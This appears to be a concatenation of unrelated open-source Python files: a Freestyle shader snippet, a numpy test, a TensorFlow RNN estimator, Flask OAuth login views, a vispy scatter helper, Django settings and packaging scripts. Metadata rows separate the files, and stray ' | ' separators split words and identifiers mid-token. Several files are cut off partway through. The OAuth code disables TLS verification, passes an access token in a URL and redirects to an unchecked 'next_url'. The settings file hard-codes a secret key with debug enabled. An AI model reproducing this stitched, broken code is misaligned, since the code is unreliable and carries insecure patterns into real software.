Operators.bidirectional_ | chain(ChainPredicateIterator(upred, bpred), NotUP1D(QuantitativeInvisibilityU | P1D(0)))
shaders_list = [
ConstantThicknessShader(2),
ConstantColorShader(0.0, 0.0, 0.0, 1.0)
]
Operators.create(TrueUP1D(), shaders_list)
|
gregvw/vector-addition | test.py | Python | mit | 180 | 0.016667 | import numpy as np
from vectoradd import printvec, addvec
if __name__ == '__main__':
n = 10
a = np.arange(n)
b = 2*n | p.flipu | d(a)
c = addvec(a,b)
printvec(c)
|
taknevski/tensorflow-xsmm | tensorflow/contrib/learn/python/learn/estimators/dynamic_rnn_estimator.py | Python | apache-2.0 | 49,250 | 0.00264 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Estimator for Dynamic RNNs."""
fro | m __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import layers
from tensorflow.contrib import rnn as contrib_rnn
from tensorflow.contrib.framework.python.framework import deprecated
from tensorflow.contrib.layers.python.layers import optimizers
from tensorflow.contrib.learn.python.learn.estimators import constants
from tensorflow.contrib.learn.python.learn.es | timators import estimator
from tensorflow.contrib.learn.python.learn.estimators import model_fn
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.contrib.learn.python.learn.estimators import rnn_common
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import rnn
from tensorflow.python.training import momentum as momentum_opt
from tensorflow.python.util import nest
# TODO(jtbates): Remove PredictionType when all non-experimental targets which
# depend on it point to rnn_common.PredictionType.
class PredictionType(object):
SINGLE_VALUE = 1
MULTIPLE_VALUE = 2
def _get_state_name(i):
"""Constructs the name string for state component `i`."""
return '{}_{}'.format(rnn_common.RNNKeys.STATE_PREFIX, i)
def state_tuple_to_dict(state):
"""Returns a dict containing flattened `state`.
Args:
state: A `Tensor` or a nested tuple of `Tensors`. All of the `Tensor`s must
have the same rank and agree on all dimensions except the last.
Returns:
A dict containing the `Tensor`s that make up `state`. The keys of the dict
are of the form "STATE_PREFIX_i" where `i` is the place of this `Tensor`
in a depth-first traversal of `state`.
"""
with ops.name_scope('state_tuple_to_dict'):
flat_state = nest.flatten(state)
state_dict = {}
for i, state_component in enumerate(flat_state):
state_name = _get_state_name(i)
state_value = (None if state_component is None
else array_ops.identity(state_component, name=state_name))
state_dict[state_name] = state_value
return state_dict
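# Illustrative (hypothetical) example: for a single LSTM cell whose state is
# the tuple (c, h), nest.flatten yields [c, h], so the returned dict maps
# '<STATE_PREFIX>_0' -> c and '<STATE_PREFIX>_1' -> h.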
def dict_to_state_tuple(input_dict, cell):
"""Reconstructs nested `state` from a dict containing state `Tensor`s.
Args:
input_dict: A dict of `Tensor`s.
cell: An instance of `RNNCell`.
Returns:
If `input_dict` does not contain keys 'STATE_PREFIX_i' for `0 <= i < n`
where `n` is the number of nested entries in `cell.state_size`, this
function returns `None`. Otherwise, returns a `Tensor` if `cell.state_size`
is an `int` or a nested tuple of `Tensor`s if `cell.state_size` is a nested
tuple.
Raises:
ValueError: State is partially specified. The `input_dict` must contain
values for all state components or none at all.
"""
flat_state_sizes = nest.flatten(cell.state_size)
state_tensors = []
with ops.name_scope('dict_to_state_tuple'):
for i, state_size in enumerate(flat_state_sizes):
state_name = _get_state_name(i)
state_tensor = input_dict.get(state_name)
if state_tensor is not None:
rank_check = check_ops.assert_rank(
state_tensor, 2, name='check_state_{}_rank'.format(i))
shape_check = check_ops.assert_equal(
array_ops.shape(state_tensor)[1],
state_size,
name='check_state_{}_shape'.format(i))
with ops.control_dependencies([rank_check, shape_check]):
state_tensor = array_ops.identity(state_tensor, name=state_name)
state_tensors.append(state_tensor)
if not state_tensors:
return None
elif len(state_tensors) == len(flat_state_sizes):
dummy_state = cell.zero_state(batch_size=1, dtype=dtypes.bool)
return nest.pack_sequence_as(dummy_state, state_tensors)
else:
raise ValueError(
        'RNN state was partially specified. '
'Expected zero or {} state Tensors; got {}'.
format(len(flat_state_sizes), len(state_tensors)))
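# Note: this is the inverse of state_tuple_to_dict above; feeding the dict
# produced there back through dict_to_state_tuple with the same cell
# reconstructs the original nested state structure.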
def _concatenate_context_input(sequence_input, context_input):
"""Replicates `context_input` accross all timesteps of `sequence_input`.
Expands dimension 1 of `context_input` then tiles it `sequence_length` times.
This value is appended to `sequence_input` on dimension 2 and the result is
returned.
Args:
sequence_input: A `Tensor` of dtype `float32` and shape `[batch_size,
padded_length, d0]`.
context_input: A `Tensor` of dtype `float32` and shape `[batch_size, d1]`.
Returns:
A `Tensor` of dtype `float32` and shape `[batch_size, padded_length,
d0 + d1]`.
Raises:
ValueError: If `sequence_input` does not have rank 3 or `context_input` does
not have rank 2.
"""
seq_rank_check = check_ops.assert_rank(
sequence_input,
3,
message='sequence_input must have rank 3',
data=[array_ops.shape(sequence_input)])
seq_type_check = check_ops.assert_type(
sequence_input,
dtypes.float32,
message='sequence_input must have dtype float32; got {}.'.format(
sequence_input.dtype))
ctx_rank_check = check_ops.assert_rank(
context_input,
2,
message='context_input must have rank 2',
data=[array_ops.shape(context_input)])
ctx_type_check = check_ops.assert_type(
context_input,
dtypes.float32,
message='context_input must have dtype float32; got {}.'.format(
context_input.dtype))
with ops.control_dependencies(
[seq_rank_check, seq_type_check, ctx_rank_check, ctx_type_check]):
padded_length = array_ops.shape(sequence_input)[1]
tiled_context_input = array_ops.tile(
array_ops.expand_dims(context_input, 1),
array_ops.concat([[1], [padded_length], [1]], 0))
return array_ops.concat([sequence_input, tiled_context_input], 2)
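# Shape example (illustrative): sequence_input [2, 5, 3] and context_input
# [2, 4] give a tiled context of [2, 5, 4] and an output of [2, 5, 7].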
def build_sequence_input(features,
sequence_feature_columns,
context_feature_columns,
weight_collections=None,
scope=None):
"""Combine sequence and context features into input for an RNN.
Args:
features: A `dict` containing the input and (optionally) sequence length
information and initial state.
sequence_feature_columns: An iterable containing all the feature columns
describing sequence features. All items in the set should be instances
of classes derived from `FeatureColumn`.
context_feature_columns: An iterable containing all the feature columns
      describing context features, i.e. features that apply across all time
steps. All items in the set should be instances of classes derived from
`FeatureColumn`.
weight_collections: List of graph collections to which weights are added.
scope: Optional scope, passed through to parsing ops.
Returns:
A `Tensor` of dtype `float32` and shape `[batch_size, padded_length, ?]`.
This will be used as input to an RNN.
"""
features = features.copy()
features.update(layers.transform_features(
features,
list(sequence_feature_columns) + list(context_feature_columns or [])))
sequence_input = layers.sequence_input_from_feature_columns(
columns_to_tensors=features,
feature_columns=sequence_feature_columns,
weight_collections=weight_collections,
scope=scope)
if context_feat |
clkao/grano | grano/views/sessions_api.py | Python | mit | 5,328 | 0.002252 | import requests
from flask import session, Blueprint, redirect
from flask import request
from grano import authz
from grano.lib.exc import BadRequest
from grano.lib.serialisation import jsonify
from grano.views.cache import validate_cache
from grano.core import db, url_for, app
from grano.providers import github, twitter, facebook
from grano.model import Account
from grano.logic import accounts
blueprint = Blueprint('sessions_api', __name__)
@blueprint.route('/api/1/sessions', methods=['GET'])
def status():
permissions = {}
if authz.logged_in():
for permission in request.account.permissions:
permissions[permission.project.slug] = {
'reader': permission.reader,
'editor': permission.editor,
'admin': permission.admin
}
keys = {
'p': repr(permissions),
'i': request.account.id if authz.logged_in() else None
}
validate_cache(keys=keys)
return jsonify({
'logged_in': authz.logged_in(),
'api_key': request.account.api_key if authz.logged_in() else None,
'account': request.account if request.account else None,
'permissions': permissions
})
def provider_not_enabled(name):
return jsonify({
'status': 501,
'name': 'Provider not configured: %s' % name,
'message': 'There are no OAuth credentials given for %s' % name,
}, status=501)
@blueprint.route('/api/1/sessions/logout', methods=['GET'])
def logout():
#authz.require(authz.logged_in())
session.clear()
return redirect(request.args.get('next_url', '/'))
@blueprint.route('/api/1/sessions/login/github', methods=['GET'])
def github_login():
if not app.config.get('GITHUB_CLIENT_ID'):
return provider_not_enabled('github')
    callback = url_for('sessions_api.github_authorized')
session.clear()
if not request.args.get('next_url'):
raise BadRequest("No 'next_url' is specified.")
session['next_url'] = request.args.get('next_url')
return github.authorize(callback=callback)
@blueprint.route('/api/1/sessions/callback/github', methods=['GET'])
@github.authorized_handler
def github_authorized(resp):
next_url = session.get('next_url', '/')
    if resp is None or 'access_token' not in resp:
return redirect(next_url)
access_token = resp['access_token']
session['access_token'] = access_token, ''
res = requests.get('https://api.github.com/user?access_token=%s' % access_token,
verify=False)
data = res.json()
account = Account.by_github_id(data.get('id'))
data_ = {
'full_name': data.get('name'),
'login': data.get('login'),
'email': data.get('email'),
'github_id': data.get('id')
}
account = accounts.save(data_, account=account)
db.session.commit()
session['id'] = account.id
return redirect(next_url)
@blueprint.route('/api/1/sessions/login/twitter', methods=['GET'])
def twitter_login():
if not app.config.get('TWITTER_API_KEY'):
return provider_not_enabled('twitter')
    callback = url_for('sessions_api.twitter_authorized')
session.clear()
if not request.args.ge | t('next_url'):
raise BadRequest("No | 'next_url' is specified.")
session['next_url'] = request.args.get('next_url')
return twitter.authorize(callback=callback)
@blueprint.route('/api/1/sessions/callback/twitter', methods=['GET'])
@twitter.authorized_handler
def twitter_authorized(resp):
next_url = session.get('next_url', '/')
    if resp is None or 'oauth_token' not in resp:
return redirect(next_url)
session['twitter_token'] = (resp['oauth_token'],
resp['oauth_token_secret'])
res = twitter.get('users/show.json?user_id=%s' % resp.get('user_id'))
account = Account.by_twitter_id(res.data.get('id'))
data_ = {
'full_name': res.data.get('name'),
'login': res.data.get('screen_name'),
'twitter_id': res.data.get('id')
}
account = accounts.save(data_, account=account)
db.session.commit()
session['id'] = account.id
return redirect(next_url)
@blueprint.route('/api/1/sessions/login/facebook', methods=['GET'])
def facebook_login():
if not app.config.get('FACEBOOK_APP_ID'):
return provider_not_enabled('facebook')
    callback = url_for('sessions_api.facebook_authorized')
session.clear()
if not request.args.get('next_url'):
raise BadRequest("No 'next_url' is specified.")
session['next_url'] = request.args.get('next_url')
return facebook.authorize(callback=callback)
@blueprint.route('/api/1/sessions/callback/facebook', methods=['GET'])
@facebook.authorized_handler
def facebook_authorized(resp):
next_url = session.get('next_url', '/')
    if resp is None or 'access_token' not in resp:
return redirect(next_url)
session['facebook_token'] = (resp.get('access_token'), '')
data = facebook.get('/me').data
account = Account.by_facebook_id(data.get('id'))
data_ = {
'full_name': data.get('name'),
'login': data.get('username'),
'email': data.get('email'),
'facebook_id': data.get('id')
}
account = accounts.save(data_, account=account)
db.session.commit()
session['id'] = account.id
return redirect(next_url)
|
astrofrog/glue-vispy-viewers | glue_vispy_viewers/scatter/multi_scatter.py | Python | bsd-2-clause | 5,723 | 0.000175 | from __future__ import absolute_import, division, print_function
from contextlib import contextmanager
import numpy as np
from matplotlib.colors import ColorConverter
from ..extern.vispy import scene
from glue.external import six
class MultiColorScatter(scene.visuals.Markers):
"""
This is a helper class to make it easier to show multiple markers at
specific positions and control exactly which marker should be on top of
which.
"""
def __init__(self, *args, **kwargs):
self.layers = {}
self._combined_data = None
self._skip_update = False
super(MultiColorScatter, self).__init__(*args, **kwargs)
@contextmanager
def delay_update(self):
        self._skip_update = True
        try:
            yield
        finally:
            self._skip_update = False
def allocate(self, label):
if label in self.layers:
raise ValueError("Layer {0} already exists".format(label))
else:
self.layers[label] = {'data': None,
'mask': None,
'color': np.asarray((1., 1., 1.)),
'alpha': 1.,
'zorder': lambda: 0,
'size': 10,
'visible': True}
def deallocate(self, label):
self.layers.pop(label)
self._update()
def set_data_values(self, label, x, y, z):
"""
Set the position of the datapoints
"""
# TODO: avoid re-allocating an array every time
self.layers[label]['data'] = np.array([x, y, z]).transpose()
self._update()
def set_visible(self, label, visible):
self.layers[label]['visible'] = visible
self._update()
def set_mask(self, label, mask):
self.layers[label]['mask'] = mask
self._update()
def set_size(self, label, size):
if not np.isscalar(size) and size.ndim > 1:
raise Exception("size should be a 1-d array")
self.layers[label]['size'] = size
self._update()
def set_color(self, label, rgb):
if isinstance(rgb, six.string_types):
rgb = ColorConverter().to_rgb(rgb)
self.layers[label]['color'] = np.asarray(rgb)
self._update()
def set_alpha(self, label, alpha):
self.layers[label]['alpha'] = alpha
self._update()
def set_zorder(self, label, zorder):
self.layers[label]['zorder'] = zorder
self._update()
def _update(self):
if self._skip_update:
return
data = []
colors = []
sizes = []
for label in sorted(self.layers, key=lambda x: self.layers[x]['zorder']()):
la | yer = self.layers[label]
if not layer['visible'] or layer['data'] is None:
continue
if layer['mask'] is None:
n_points = layer['data'].shape[0]
else:
n_points = np.sum(layer['mas | k'])
if n_points > 0:
# Data
if layer['mask'] is None:
data.append(layer['data'])
else:
data.append(layer['data'][layer['mask'], :])
# Colors
if layer['color'].ndim == 1:
rgba = np.hstack([layer['color'], 1])
rgba = np.repeat(rgba, n_points).reshape(4, -1).transpose()
else:
if layer['mask'] is None:
rgba = layer['color'].copy()
else:
rgba = layer['color'][layer['mask']]
rgba[:, 3] *= layer['alpha']
colors.append(rgba)
# Sizes
if np.isscalar(layer['size']):
size = np.repeat(layer['size'], n_points)
else:
if layer['mask'] is None:
size = layer['size']
else:
size = layer['size'][layer['mask']]
sizes.append(size)
if len(data) == 0:
self.visible = False
return
else:
self.visible = True
data = np.vstack(data)
colors = np.vstack(colors)
sizes = np.hstack(sizes)
self.set_data(data, edge_color=colors, face_color=colors, size=sizes)
def draw(self, *args, **kwargs):
if len(self.layers) == 0:
return
else:
try:
super(MultiColorScatter, self).draw(*args, **kwargs)
except Exception:
pass
if __name__ == "__main__": # pragma: nocover
from ..extern.vispy import app, scene
canvas = scene.SceneCanvas(keys='interactive')
view = canvas.central_widget.add_view()
view.camera = scene.TurntableCamera(up='z', fov=60)
x = np.random.random(20)
y = np.random.random(20)
z = np.random.random(20)
multi_scat = MultiColorScatter(parent=view.scene)
multi_scat.allocate('data')
multi_scat.set_zorder('data', lambda: 0)
multi_scat.set_data_values('data', x, y, z)
multi_scat.allocate('subset1')
multi_scat.set_mask('subset1', np.random.random(20) > 0.5)
multi_scat.set_color('subset1', 'red')
multi_scat.set_zorder('subset1', lambda: 1)
multi_scat.allocate('subset2')
multi_scat.set_mask('subset2', np.random.random(20) > 0.5)
multi_scat.set_color('subset2', 'green')
multi_scat.set_zorder('subset2', lambda: 2)
multi_scat.set_alpha('subset2', 0.5)
multi_scat.set_size('subset2', 20)
axis = scene.visuals.XYZAxis(parent=view.scene)
canvas.show()
app.run()
|
djangothon/django-engage | django_engage/settings.py | Python | mit | 3,040 | 0 | """
Django settings for django_engage project.
Generated by 'django-admin startproject' using Djang | o 1.8.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os | .path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '4%z9k*!y3p*yba5*^-ve^4^2rxol0f4fqvdkq41&tc5unkz=#^'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'swampdragon',
'engage',
'testapp',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'django_engage.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
'django.template.context_processors.static',
],
'debug': True
},
},
]
WSGI_APPLICATION = 'django_engage.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
# SwampDragon settings
SWAMP_DRAGON_CONNECTION = (
'swampdragon_auth.socketconnection.HttpDataConnection',
'/data'
)
DRAGON_URL = 'http://localhost:9999/'
|
Splawik/pytigon | pytigon/prj/scheditor/sched/models.py | Python | lgpl-3.0 | 531 | 0.001883 | import django
from django.db import models
from pyti | gon_lib.schdjangoext.fields import *
from pytigon_lib.schdjangoext.models import *
import pytigon_lib.schdjango | ext.fields as ext_models
from pytigon_lib.schtools import schjson
from django.utils.translation import gettext_lazy as _
from django.contrib import admin
import os, os.path
import sys
from pytigon_lib.schhtml.htmltools import superstrip
from schwiki.models import *
from schcommander.models import *
from schtasks.models import *
from schtools.models import *
|
fluidinfo/Tickery | setup.py | Python | apache-2.0 | 1,202 | 0 | #!/usr/bin/env python
import glob
from distutils.core import setup
from tickery.version import version
# Where Tickery files such as the HTML, Javascript, and the Twisted plugin
# should be installed on the destination host:
TICKERY_ROOT = '/opt/tickery'
setup(name='tickery',
version=version,
scripts=glob.glob('bin/*.py'),
packages=['tickery', 'tickery.test'],
data_files=[
('%s/twisted/plugins' % TICKERY_ROOT,
['twisted/plugins/tickery_service.py']),
('%s/tickery' % TICKERY_ROOT,
['tickery/Makefile']),
# Public (www) files:
('%s/tickery/www' % TICKERY_ROOT,
['tickery/www/Makefile'] + glob.glob('tickery/www/*.py')),
('%s/tickery/www/public' % TICKERY_ROOT,
glob.glob('tickery/www/public/*')),
# Admin files:
('%s/tickery/admin' % TICKERY_ROOT,
['tickery/admin/Makefile'] + glob.glob('tickery/admin/*.py')),
('%s/tickery/admin/public' % TICKERY_ROOT,
glob.glob('tickery/admin/public/*'))
],
maintainer='Fluidinfo Inc.',
maintainer_email='info@fluidinf | o.com',
url= | 'http://fluidinfo.com/')
|
AntonelliLab/seqcap_processor | secapr/utils.py | Python | mit | 531 | 0.011299 | #!/usr/bin/env python3
# -*- co | ding: utf-8 -*-
"""
Created on Tue Oct 15 17:08:10 2019
@author: Tobias Andermann (tobias.andermann@bioenv.gu.se)
"""
import numpy as np
np.set_printoptions(suppress=True)
import pandas as pd
import matplotlib.pyplot as plt
import os
import argparse
class CompletePath(argparse.Action):
"""give the full path of an input file/folder"""
def __call__(self, parser, | namespace, values, option_string=None):
setattr(namespace, self.dest, os.path.abspath(os.path.expanduser(values)))
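# Hypothetical usage sketch: parser.add_argument('out_dir', action=CompletePath)
# would store the absolute, user-expanded path on the parsed namespace.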
|
cescobarresi/ciscoreputation | ciscoreputation/__about__.py | Python | mit | 1,212 | 0.003344 | # encoding: utf-8
import os.path
__all__ = [
"__title__", "__summary__", "__uri__", "__version__",
"__author__", "__email__", "__license__", "__copyright__",
]
try:
base_dir = os.path.dirname(os.path.abspath(__file__))
except NameError:
base_dir = None
__title__ = "ciscoreputation"
__summa | ry__ = "Get the Cisco's senderbase.org reputation for a hostname or ip address"
__uri__ = "https://github.com/cescobarresi/ciscoreputation"
# Versioning is a 3-part MAJOR.MINOR.MAINTENANCE numbering scheme, where the project author increments:
#
# MAJOR version when they make incompatible API changes,
# MINOR versio | n when they add functionality in a backwards-compatible manner, and
# MAINTENANCE version when they make backwards-compatible bug fixes.
# zero or more dev releases (denoted with a ".devN" suffix)
# zero or more alpha releases (denoted with a ".aN" suffix)
# zero or more beta releases (denoted with a ".bN" suffix)
# zero or more release candidates (denoted with a ".rcN" suffix)
#
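# Illustrative (hypothetical) progression for this release:
#   2.1.4.dev1 -> 2.1.4.a1 -> 2.1.4.b1 -> 2.1.4.rc1 -> 2.1.4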
__version__ = "2.1.4"
__author__ = "Francesco Barresi"
__email__ = "francescobarresi@bbfactory.it"
__license__ = "MIT"
__copyright__ = "2018 %s" % __author__
|
sorz/isi | store/category/migrations/0001_initial.py | Python | mit | 1,172 | 0.003413 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
( | 'name', models.CharField(max_length=255, verbose_name='Category Name')),
('description', models.TextField(null=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='PropertyName',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_cr | eated=True, serialize=False)),
('name', models.CharField(max_length=255, verbose_name='Property Name')),
('description', models.TextField(null=True)),
('category', models.ForeignKey(to='category.Category')),
],
options={
},
bases=(models.Model,),
),
]
|
Cornices/cornice.ext.swagger | cornice_swagger/converters/__init__.py | Python | apache-2.0 | 620 | 0.001613 | """
This module handles the conversion between colander obj | ect schemas and swagger
object schemas.
"""
from cornice_swagger.converters.schema import TypeConversionDispatcher
from cornice_swagger.converters.parameters import ParameterConversionDispatcher
def convert_schema(schema_node):
dispatcher = TypeConversionDispatcher()
converted = dispatcher(schema_node)
return converted
def convert_parameter(location, schema_node, definition_handler=convert_schema):
dispatcher = ParameterConversionDispatcher(definition_handler)
converte | d = dispatcher(location, schema_node)
return converted
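# Hedged usage sketch (assuming a colander schema): for a node such as
# colander.SchemaNode(colander.Int()), convert_schema is expected to return a
# swagger-style dict along the lines of {'type': 'integer'}.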
|
loopCM/chromium | chrome/test/chromedriver/run_java_tests.py | Python | bsd-3-clause | 10,860 | 0.009024 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs the WebDriver Java acceptance tests.
This script is called from chrome/test/chromedriver/run_all_tests.py and reports
results using the buildbot annotation scheme.
For ChromeDriver documentation, refer to http://code.google.com/p/chromedriver.
"""
import optparse
import os
import shutil
import sys
import xml.dom.minidom as minidom
_THIS_DIR = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, os.path.join(_THIS_DIR, os.pardir, 'pylib'))
from common import chrome_paths
from common import util
import test_environment
class TestResult(object):
"""A result for an attempted single test case."""
def __init__(self, name, time, failure):
"""Initializes a test result.
Args:
name: the full name of the test.
time: the amount of time the test ran, in seconds.
failure: the test error or failure message, or None if the test passed.
"""
self._name = name
self._time = time
self._failure = failure
def GetName(self):
"""Returns the test name."""
return self._name
def GetTime(self):
"""Returns the time it took to run the test."""
return self._time
def IsPass(self):
"""Returns whether the test passed."""
return self._failure is None
def GetFailureMessage(self):
"""Returns the test failure message, or None if the test passed."""
return self._failure
def _Run(java_tests_src_dir, test_filter,
chromedriver_path, chrome_path, android_package,
verbose, debug):
"""Run the WebDriver Java tests and return the test results.
Args:
java_tests_src_dir: the java test source code directory.
test_filter: the filter to use when choosing tests to run. Format is same
as Google C++ Test format.
chromedriver_path: path to ChromeDriver exe.
chrome_path: path to Chrome exe.
android_package: name of Chrome's Android package.
verbose: whether the output should be verbose.
debug: whether the tests should wait until attached by a debugger.
Returns:
A list of |TestResult|s.
"""
test_dir = util.MakeTempDir()
keystore_path = ('java', 'client', 'test', 'keystore')
required_dirs = [keystore_path[:-1],
('javascript',),
('third_party', 'closure', 'goog'),
('third_party', 'js')]
for required_dir in required_dirs:
os.makedirs(os.path.join(test_dir, *required_dir))
test_jar = 'test-standalone.jar'
class_path = test_jar
shutil.copyfile(os.path.join(java_tests_src_dir, 'keystore'),
os.path.join(test_dir, *keystore_path))
util.Unzip(os.path.join(java_tests_src_dir, 'common.zip'), test_dir)
shutil.copyfile(os.path.join(java_tests_src_dir, test_jar),
os.path.join(test_dir, test_jar))
sys_props = ['selenium.browser=chrome',
'webdriver.chrome.driver=' + os.path.abspath(chromedriver_path)]
if chrome_path is not None:
sys_props += ['webdriver.chrome.binary=' + os.path.abspath(chrome_path)]
if android_package is not None:
sys_props += ['webdriver.chrome.android_package=' + android_package]
if test_filter:
# Test jar actually takes a regex. Convert from glob.
test_filter = test_filter.replace('*', '.*')
sys_props += ['filter=' + test_filter]
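  # e.g. a glob filter such as '*ChromeDriver*' becomes the regex
  # '.*ChromeDriver.*' before being passed to the test jar.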
jvm_args = []
if debug:
jvm_args += ['-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,'
'address=33081']
# Unpack the sources into the test directory and add to the class path
# for ease of debugging, particularly with jdb.
util.Unzip(os.path.join(java_tests_src_dir, 'test-nodeps-srcs.jar'),
test_dir)
class_path += ':' + test_dir
return _RunAntTest(
test_dir, 'org.openqa.selenium.chrome.ChromeDriverTests',
class_path, sys_props, jvm_args, verbose)
def _RunAntTest(test_dir, test_class, class_path, sys_props, jvm_args, verbose):
"""Runs a single Ant JUnit test suite and returns the |TestResult|s.
Args:
test_dir: the directory to run the tests in.
test_class: the name of the JUnit test suite class to run.
class_path: the Java class path used when running the tests, colon delimited
sys_props: Java system properties to set when running the tests.
jvm_args: Java VM command line args to use.
verbose: whether the output should be verbose.
Returns:
A list of |TestResult|s.
"""
def _CreateBuildConfig(test_name, results_file, class_path, junit_props,
sys_props, jvm_args):
def _SystemPropToXml(prop):
key, value = prop.split('=')
return '<sysproperty key="%s" value="%s"/>' % (key, value)
def _JvmArgToXml(arg):
return '<jvmarg value="%s"/>' % arg
return '\n'.join([
'<project>',
' <target name="test">',
' <junit %s>' % ' '.join(junit_props),
' <formatter type="xml"/>',
' <classpath>',
' <pathelement path="%s"/>' % class_path,
' </classpath>',
' ' + '\n '.join(map(_SystemPropToXml, sys_props)),
' ' + '\n '.join(map(_JvmArgToXml, jvm_args)),
' <test name="%s" outfile="%s"/>' % (test_name, results_file),
' </junit>',
' </target>',
'</project>'])
def _ProcessResults(results_path):
doc = minidom.parse(results_path)
tests = []
for test in doc.getElementsByTagName('testcase'):
name = test.getAttribute('classname') + '.' + test.getAttribute('name')
| time = test.getAttribute('time')
failure = None
error_nodes = test.getElementsByTagName('error')
failure_nodes = test.getElementsByTagName('failure')
if error_nodes:
failure = error_nodes[0].childNodes[0].nodeValue
elif failure_nodes:
failure = failure_nodes[0].childNodes[0].nodeValue
tests += [TestResult(name, time, failure)]
return tests
juni | t_props = ['printsummary="yes"',
'fork="yes"',
'haltonfailure="no"',
'haltonerror="no"']
if verbose:
junit_props += ['showoutput="yes"']
ant_file = open(os.path.join(test_dir, 'build.xml'), 'w')
ant_file.write(_CreateBuildConfig(
test_class, 'results', class_path, junit_props, sys_props, jvm_args))
ant_file.close()
if util.IsWindows():
ant_name = 'ant.bat'
else:
ant_name = 'ant'
code = util.RunCommand([ant_name, 'test'], cwd=test_dir)
if code != 0:
print 'FAILED to run java tests of %s through ant' % test_class
return
return _ProcessResults(os.path.join(test_dir, 'results.xml'))
def PrintTestResults(results):
"""Prints the given results in a format recognized by the buildbot."""
failures = []
failureNames = []
for result in results:
if not result.IsPass():
failures += [result]
failureNames += ['.'.join(result.GetName().split('.')[-2:])]
print 'Ran %s tests' % len(results)
print 'Failed %s:' % len(failures)
for result in failures:
print '=' * 80
print '=' * 10, result.GetName(), '(%ss)' % result.GetTime()
print result.GetFailureMessage()
if failures:
print '@@@STEP_TEXT@Failed %s tests@@@' % len(failures)
print 'Rerun failing tests with filter:', ':'.join(failureNames)
return len(failures)
def main():
parser = optparse.OptionParser()
parser.add_option(
'', '--verbose', action="store_true", default=False,
help='Whether output should be verbose')
parser.add_option(
'', '--debug', action="store_true", default=False,
help='Whether to wait to be attached by a debugger')
parser.add_option(
'', '--chromedriver', type='string', default=None,
help='Path to a build of the chromedriver library(REQUIRED!)')
parser.add_option(
'', '--chrome', type='string', default=None,
help='Path to a build of the chrome binary')
parser.add_option(
'', '--chrome-version', default='HEAD',
help='Version of chrome. Default is \'HEAD\'')
parser.add_option(
|
Tayamarn/socorro | socorro/unittest/external/es/test_analyzers.py | Python | mpl-2.0 | 1,852 | 0 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from socorro.lib import datetimeutil
from socorro.unittest.external.es.base import (
ElasticsearchTestCase,
SuperSearchWithFields,
minimum_es_version,
)
# Uncomment these lines to decrease verbosity of the elasticsearch library
# while running unit test | s.
# import logging
# logging.getLogger('elasticsearch').setLevel(logging.ERROR)
# logging.getLogger('requests').setLevel(logging.ERROR)
class IntegrationTestAnalyzers(ElasticsearchTestCase):
"""Test the custom analyzers we create in our indices. """
def setUp(self):
super(IntegrationTestAnalyzers, self).setUp()
self.api = SuperSearchWithFields(config=self.config)
self.now = datetimeutil.utc_now()
@minimum_es_version('1.0')
def test_semicolon_keywords(self):
| """Test the analyzer called `semicolon_keywords`.
That analyzer creates tokens (terms) by splitting the input on
